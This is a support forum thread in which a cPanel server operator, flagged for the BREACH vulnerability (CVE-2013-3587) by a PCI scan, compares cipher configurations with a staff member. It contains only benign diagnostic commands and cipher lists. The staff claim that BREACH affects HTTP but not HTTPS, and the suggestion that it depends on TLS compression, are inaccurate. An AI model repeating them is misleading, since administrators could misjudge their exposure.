BREACH vulnerability - CVE 2013-3587

vpswing

• July 21, 2020 03:02

We run 4 cPanel servers (latest stable release). The latest PCI-DSS scan failed because of CVE 2013-3587 (BREACH attack) ref:

• 

  cPanelLauren

  • July 21, 2020 14:55

  Hi @vpswing That's a pretty old vulnerability, I am curious if you have made any customizations on your ciphers? What is the output of the following? cat /var/cpanel/conf/cpsrvd/main
  

  0
• 

  vpswing

  • July 21, 2020 15:29

  Hi @vpswing That's a pretty old vulnerability, I am curious if you have made any customizations on your ciphers? What is the output of the following? cat /var/cpanel/conf/cpsrvd/main
  

  
  It showed 'no such file or directory'

  0
• 

  vpswing

  • July 21, 2020 15:32

  In the /etc/apache2/conf/httpd.conf file: SSLCipherSuite ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256 SSLProtocol TLSv1.2 SSLPassPhraseDialog builtin SSLUseStapling On SSLStaplingCache shmcb:/run/apache2/stapling_cache_shmcb(256000) # Prevent browsers from failing if an OCSP server is temporarily broken. SSLStaplingReturnResponderErrors off SSLStaplingErrorCacheTimeout 60 SSLStaplingFakeTryLater off SSLStaplingResponderTimeout 3 SSLSessionCache shmcb:/run/apache2/ssl_gcache_data_shmcb(1024000) SSLSessionCache dbm:/run/apache2/ssl_gcache_data_dbm SSLSessionCacheTimeout 300 Mutex file:/run/apache2 ssl-cache SSLRandomSeed startup builtin SSLRandomSeed connect builtin
  

  0
• 

  cPanelLauren

  • July 21, 2020 17:03

  cPanel uses a different cipher suite for its webserver which runs over cpsrvd than apache does. Can you go to WHM>>Service Configuration>>cPanel Web Services Configuration and click "Save" then run the same command again? I ask because the default cipher list should be PCI compliant and I am curious if what you're using is older than the current default. You could also potentially compare by checking against the v88 defaults: ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384
  

  0
• 

  vpswing

  • July 22, 2020 02:19

  It now shows: --- SSLCipherList: ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384 SSLVersion: SSLv23:!SSLv2:!SSLv3:!TLSv1:!TLSv1_1 VERSION: '1.2' Just a thought - from what I understand about the BREACH vulnerability - it can be mitigated by disabling TLS/SSL-level compression. Does the above cipher disables TLS/SSL compression? (the previous time when I ran the command 'cat /var/cpanel/conf/cpsrvd/main' - and it showed file not found, what cipher was cPanel webservice using then?) Thanks

  0
• 

  cPanelLauren

  • July 22, 2020 16:16

  My goal was to rule out some old cipher or communication issue, yours are fine. BREACH is related to compression but it is alarming that the PCI scanning company would flag this specific issue. As far as I was ever aware the CVE only affects HTTP not HTTPS and all ports you noted only accept HTTPS communication. There was an old case on this and here's what it had to say: [QUOTE]Our CSRF tokens should be enough to mitigate BREACH attacks since they are used on all pages with sensitive information. CSRF tokens are listed as a valid way to protect against this vuln on

  0
• 

  vpswing

  • July 22, 2020 22:48

  Thank you Lauren! Appreciate your/cPanel's response to this issue. Best regards, Adrian

  0
• 

  juanregres4

  • May 24, 2022 18:16

  How did you solve the problem to get certified?

  0

Please sign in to leave a comment.